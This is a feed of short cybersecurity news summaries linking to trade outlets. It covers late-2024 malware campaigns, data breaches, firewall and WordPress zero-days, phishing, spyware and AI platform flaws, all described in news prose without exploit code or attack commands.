Swiss Cyber Agency Warns of QR Code Malware in Mail Scam A new malware campaign targeting Swiss residents through fake postal letters has been uncovered by the country’s National Cyber Security Centre (NCSC). The scam involves fraudulent correspondence disguised as official communication from MeteoSwiss, the Federal Office of Meteorology and Climatology, urging recipients to scan a QR code and download a malicious weather app for Android devices. The fake app, called “Severe Weather Warning App,” mimics the legitimate Alertswiss app but is labeled “AlertSwiss” with a slightly altered logo. Unlike the authentic app, which is available on the Google Play Store, the fraudulent version is hosted on an unverified third-party website. Once installed, the app deploys a Coper Trojan variant to steal sensitive data, including banking credentials, and intercepts two-factor authentication (2FA) codes. See more:

Infosecurity Magazine

Swiss Cyber Agency Warns of QR Code Malware in Mail Scam

Switzerland’s National Cyber Security Centre has warned of a new QR code scam in fake MeteoSwiss letters spreading Android malware

#cybersecurity #malware

Ransomware Attack on Oklahoma Medical Center Impacts 133,000 Great Plains Regional Medical Center in Oklahoma is notifying over 133,000 individuals that their personal information was compromised in a ransomware attack. The public, not-for-profit healthcare system discovered the attack on September 8, 2024, when ransomware was deployed, but the attackers had access to its systems for at least three days prior. According to the medical center, the attackers accessed and encrypted certain files between September 5 and September 8, and exfiltrated information from its systems. See more:

SecurityWeek

Ransomware Attack on Oklahoma Medical Center Impacts 133,000

Great Plains Regional Medical Center says the personal information of 133,000 individuals was compromised in a ransomware attack.

#cybersecurity #databreach

AnnieMac Data Breach Impacts 171,000 People New Jersey-based mortgage loan provider AnnieMac Home Mortgage (American Neighborhood Mortgage Acceptance Company) is informing many individuals of a recent data breach. In notification letters to impacted individuals, AnnieMac revealed that it detected suspicious activity on some systems on August 23, 2024. An investigation showed that hackers had access to its systems between August 21 and August 23, and they viewed and/or copied files containing personal information. The compromised information includes names and Social Security numbers. See more:

SecurityWeek

AnnieMac Data Breach Impacts 171,000 People

AnnieMac Home Mortgage is informing over 171,000 individuals that their data has been compromised in a hacker attack.

#cybersecurity #databreach

Gmail's New Shielded Email Feature Lets Users Create Aliases for Email Privacy Google appears to be readying a new feature called Shielded Email that allows users to create email aliases when signing up for online services and better combat spam. The feature was first reported by Android Authority last week following a teardown of the latest version of Google Play Services for Android. The idea is to create unique, single-use email addresses that forward the messages to the associated primary account, thereby preventing the need for providing the real email address when filling out forms or registering for new services online. See more:

The Hacker News

Gmail's New Shielded Email Feature Lets Users Create Aliases for Email Privacy

Google launches Shielded Email, enabling unique aliases for sign-ups to boost privacy and reduce spam.

#cybersecurity #privacy #gmail

Palo Alto Networks patches two firewall zero-days used in attacks Palo Alto Networks has finally released security updates for two actively exploited zero-day vulnerabilities in its Next-Generation Firewalls (NGFW). The first flaw, tracked as CVE-2024-0012, is an authentication bypass found in the PAN-OS management web interface that remote attackers can exploit to gain administrator privileges without requiring authentication or user interaction. The second one (CVE-2024-9474) is a PAN-OS privilege escalation security flaw that allows malicious PAN-OS administrators to perform actions on the firewall with root privileges. While CVE-2024-9474 was disclosed today, the company first warned customers on November 8 to restrict access to their next-generation firewalls because of a potential RCE flaw tagged last Friday as CVE-2024-0012. See more Bleeping Computer:

BleepingComputer

Palo Alto Networks patches two firewall zero-days used in attacks

Palo Alto Networks has finally released security updates for an actively exploited zero-day vulnerability in its Next-Generation Firewalls (NGFW).

Security Week:

SecurityWeek

Palo Alto Networks Releases IoCs for New Firewall Zero-Day

Palo Alto Networks has released IoCs for the attacks exploiting a newly uncovered firewall zero-day vulnerability.

Fake Discount Sites Exploit Black Friday to Hijack Shopper Information A new phishing campaign is targeting e-commerce shoppers in Europe and the United States with bogus pages that mimic legitimate brands with the goal of stealing their personal information ahead of the Black Friday shopping season. "The campaign leveraged the heightened online shopping activity in November, the peak season for Black Friday discounts. The threat actor used fake discounted products as phishing lures to deceive victims into providing their Cardholder Data (CHD) and Sensitive Authentication Data (SAD) and Personally Identifiable Information (PII)," EclecticIQ said. The activity, first observed in early October 2024, has been attributed with high confidence to a Chinese financially motivated threat actor codenamed SilkSpecter. Some of the impersonated brands include IKEA, L.L.Bean, North Face, and Wayfare. See more:

The Hacker News

Fake Discount Sites Exploit Black Friday to Hijack Shopper Information

New phishing campaign targets Black Friday e-commerce shoppers in Europe and US, stealing personal and financial data via fake brand websites.

#cybersecurity #phishing

Phishing emails increasingly use SVG attachments to evade detection Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code. See more:

BleepingComputer

Phishing emails increasingly use SVG attachments to evade detection

Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection.

#cybersecurity #phishing #svg

T-Mobile confirms it was hacked in recent wave of telecom breaches T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private communications, call records, and law enforcement information requests. "T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information," T-Mobile told the Wall Street Journal, which first reported about the breach. T-Mobile shared a similar statement with BleepingComputer, stating it has found no evidence of any customer data being accessed or exfiltrated. See more Bleeping Computer:

BleepingComputer

T-Mobile confirms it was hacked in recent wave of telecom breaches

T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private comm...

Security Week:

SecurityWeek

T-Mobile Also Targeted in Chinese Telecom Hacking Campaign

T-Mobile has also been targeted by the Chinese group Salt Typhoon in a major espionage campaign targeting US telecom companies.

#cybersecurity #hack

GitHub projects targeted with malicious commits to frame researcher GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker's true intentions.

BleepingComputer

GitHub projects targeted with malicious commits to frame researcher

GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, ...

#cybersecurity #backdoors #malware

Sentry just gave $750k to open source projects "Sentry started out as an Open Source side project in 2008. Today we are a Fair Source company with 100,000+ organizations on our SaaS and $100M+ ARR, but we have not forgotten our roots nor the hundreds of Open Source maintainers whose work we depend on for our success. Every year we share our success with the community, and 2024 is no different. This year, our budget is $750,000, up 50% from last year. The big news this year is that, together with dozens of other companies, we launched the Open Source Pledge. It’s great that Sentry pays maintainers, but we can’t solve the Open Source sustainability crisis by ourselves. The good news is that we’re not alone. Through the Pledge, many other companies are also stepping up to the plate, paying maintainers at least $2,000 per year per dev on staff and blogging about it annually to drive awareness and accountability." See more:

Product Blog • Sentry

We Just Gave $750,000 to Open Source Maintainers

In honor of the 4th year of our Open Source Pledge, we’re excited to continue driving this important conversation. See what we’ve accomplished ...

#opensource

Botnet exploits GeoVision zero-day to install Mirai malware A malware botnet is exploiting a zero-day vulnerability in end-of-life GeoVision devices to compromise and recruit them for likely DDoS or cryptomining attacks. The flaw is tracked as CVE-2024-11120 and was discovered by Piort Kijewski of The Shadowserver Foundation. It is a critical severity (CVSS v3.1 score: 9.8) OS command injection problem, allowing unauthenticated attackers to execute arbitrary system commands on the device. "Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device," warns Taiwan's CERT. "Moreover, this vulnerability has already been exploited by attackers, and we have received related reports." See more:

BleepingComputer

Botnet exploits GeoVision zero-day to install Mirai malware

A malware botnet is exploiting a zero-day vulnerability in end-of-life GeoVision devices to compromise and recruit them for likely DDoS or cryptomi...

#cybersecurity #malware #zeroday

These 8 Apps on Google Play Store Contain Android/FakeApp Trojan Russian cybersecurity firm Dr. Web has exposed several Android apps on the Google Play Store that contain a sophisticated trojan, Android[.]FakeApp[.]1669 (also known as Android/FakeApp). These apps, which claim to provide practical functions like financial tools, planners, and recipe books; contain a hidden payload that redirects users to unwanted websites, compromising their data. What’s worse, more than 2 million users have downloaded these infected apps from Google Play, unaware of the threat. Malware on the official Google Play Store is nothing new. In fact, reports from last month indicate a rise in malicious apps on both the Apple App Store and Google Play Store. See more:

These 8 Apps on Google Play Store Contain Android/FakeApp Trojan – Hackread – Cybersecurity News, Data Breaches, AI, and More

#cybersecurity #android #malware

Summary of noteworthy news from the last week by SecurityWeek! TSA proposes new cyber rules for pipelines and railroads, Google adds scam call detection to Android, SIM swappers arrested in US, and more... See more:

SecurityWeek

In Other News: TSA Wants New Cyber Rules, Scam Call Detection in Android, SIM Swappers Arrested

TSA proposes new cyber rules for pipelines and railroads, Google adds scam call detection to Android, SIM swappers arrested in US.

#cybersecurity #news

Iranian Hackers Deploy WezRat Malware in Attacks Targeting Israeli Organizations Cybersecurity researchers have shed light on a new remote access trojan and information stealer used by Iranian state-sponsored actors to conduct reconnaissance of compromised endpoints and execute malicious commands. Cybersecurity company Check Point has codenamed the malware WezRat, stating it has been detected in the wild since at least September 1, 2023, based on artifacts uploaded to the VirusTotal platform. "WezRat can execute commands, take screenshots, upload files, perform keylogging, and steal clipboard content and cookie files," it said in a technical report. "Some functions are performed by separate modules retrieved from the command and control (C&C) server in the form of DLL files, making the backdoor's main component less suspicious." WezRat is assessed to be the work of Cotton Sandstorm, an Iranian hacking group that's better known under the cover names Emennet Pasargad and, more recently, Aria Sepehr Ayandehsazan (ASA). See more:

The Hacker News

Iranian Hackers Deploy WezRat Malware in Attacks Targeting Israeli Organizations

WezRat malware, linked to Iranian hackers, uses phishing and Trojanized Chrome installers to steal data.

#cybersecurity #malware #trojan

NSO Group used another WhatsApp zero-day after being sued, court docs say Israeli surveillance firm NSO Group reportedly used multiple zero-day exploits, including an unknown one named "Erised," that leveraged WhatsApp vulnerabilities to deploy Pegasus spyware in zero-click attacks, even after getting sued. Pegasus is NSO Group's spyware platform (marketed as surveillance software for governments worldwide), with multiple software components that provide customers with extensive surveillance capabilities over victims' compromised devices. For instance, NSO customers could monitor the victims' activity and extract information using the Pegasus agent installed on the victims' mobile phones. See more:

BleepingComputer

NSO Group used another WhatsApp zero-day after being sued, court docs say

Israeli surveillance firm NSO Group reportedly used multiple zero-day exploits, including an unknown one named "Erised," that leveraged WhatsApp vu...

#cybersecurity #spyware #privacy

Researchers Warn of Privilege Escalation Risks in Google's Vertex AI ML Platform Cybersecurity researchers have disclosed two security flaws in Google's Vertex machine learning (ML) platform that, if successfully exploited, could allow malicious actors to escalate privileges and exfiltrate models from the cloud. "By exploiting custom job permissions, we were able to escalate our privileges and gain unauthorized access to all data services in the project," Palo Alto Networks Unit 42 researchers Ofir Balassiano and Ofir Shaty said in an analysis published earlier this week. "Deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a serious proprietary and sensitive data exfiltration attack risk." Vertex AI is Google's ML platform for training and deploying custom ML models and artificial intelligence (AI) applications at scale. It was first introduced in May 2021. See more:

The Hacker News

Researchers Warn of Privilege Escalation Risks in Google's Vertex AI ML Platform

Two Vertex AI flaws let attackers escalate privileges and exfiltrate sensitive ML models. Risks now mitigated.

#cybersecurity #vertexai

Fraud network uses 4,700 fake shopping sites to steal credit cards A financially motivated Chinese threat actor dubbed "SilkSpecter" is using thousands of fake online stores to steal the payment card details of online shoppers in the U.S. and Europe. The fraud campaign started in October 2024, offering steep discounts for the upcoming Black Friday shopping period that usually sees elevated shopping activity. EclecticIQ threat researcher Arda Buyukkaya, who discovered the campaign, told BleepingComputer that, as of the publishing of their report, SilkSpecter operates 4,695 fraudulent domains. These sites impersonate well-known brands such as the North Face, Lidl, Bath & Body Works, L.L. Bean, Wayfair, Makita, IKEA, and Gardena. See more:

BleepingComputer

Fraud network uses 4,700 fake shopping sites to steal credit cards

A financially motivated Chinese threat actor dubbed "SilkSpecter" is using thousands of fake online stores to steal the payment card details of onl...

#cybersecurity #phishing

watchTowr Finds New Zero-Day Vulnerability in Fortinet Products Attack surface management provider watchTowr claims to have found a new zero-day vulnerability in cybersecurity provider Fortinet’s products. This flaw would allow a managed FortiGate device to elevate privileges and seize control of the FortiManager instance. This vulnerability, which carries a common vulnerability severity score (CVSS) of 9.8, is actively exploited in the wild, sometimes together with CVE-2024-23113. It allows threat actors to use a compromised FortiManager device to execute arbitrary code or commands against other FortiManager devices. See more:

Infosecurity Magazine

watchTowr Finds New Zero-Day Vulnerability in Fortinet Products

The new vulnerability was named “FortiJump Higher” due to its similarity with the “FortiJump” vulnerability discovered in October

#cybersecurity #fortinet

ChatGPT allows access to underlying sandbox OS, “playbook” data OpenAI's ChatGPT platform provides a great degree of access to the LLM's sandbox, allowing you to upload programs and files, execute commands, and browse the sandbox's file structure. The ChatGPT sandbox is an isolated environment that allows users to interact with the it securely while being walled off from other users and the host servers. It does this by restricting access to sensitive files and folders, blocking access to the internet, and attempting to restrict commands that can be used to exploit flaws or potentially break out of the sandbox. Marco Figueroa of Mozilla's 0-day investigative network, 0DIN, discovered that it's possible to get extensive access to the sandbox, including the ability to upload and execute Python scripts and download the LLM's playbook. See more:

BleepingComputer

ChatGPT allows access to underlying sandbox OS, “playbook” data

OpenAI's containerized ChatGPT environment is open to limited yet extensive access to core instructions while allowing arbitrary file uploads ...

#cybersecurity #chatgpt

Critical Plugin Flaw Exposed 4 Million WordPress Websites to Takeover A critical-severity vulnerability in the Really Simple Security plugin for WordPress potentially exposed four million websites to complete takeover, WordPress security firm Defiant warns. Tracked as CVE-2024-10924 (CVSS score of 9.8), the issue is described as an authentication bypass that allows an unauthenticated attacker to log in as any user, including an administrator. According to Defiant, the security defect exists because of an improper user check error handling in the plugin’s two-factor REST API action. Specifically, the bug is triggered if two-factor authentication (2FA) is enabled. See more:

SecurityWeek

Critical Plugin Flaw Exposed 4 Million WordPress Websites to Takeover

Over 4 million WordPress websites were impacted by a critical Really Simple Security vulnerability providing full administrative access.

#cybersecurity #wordpress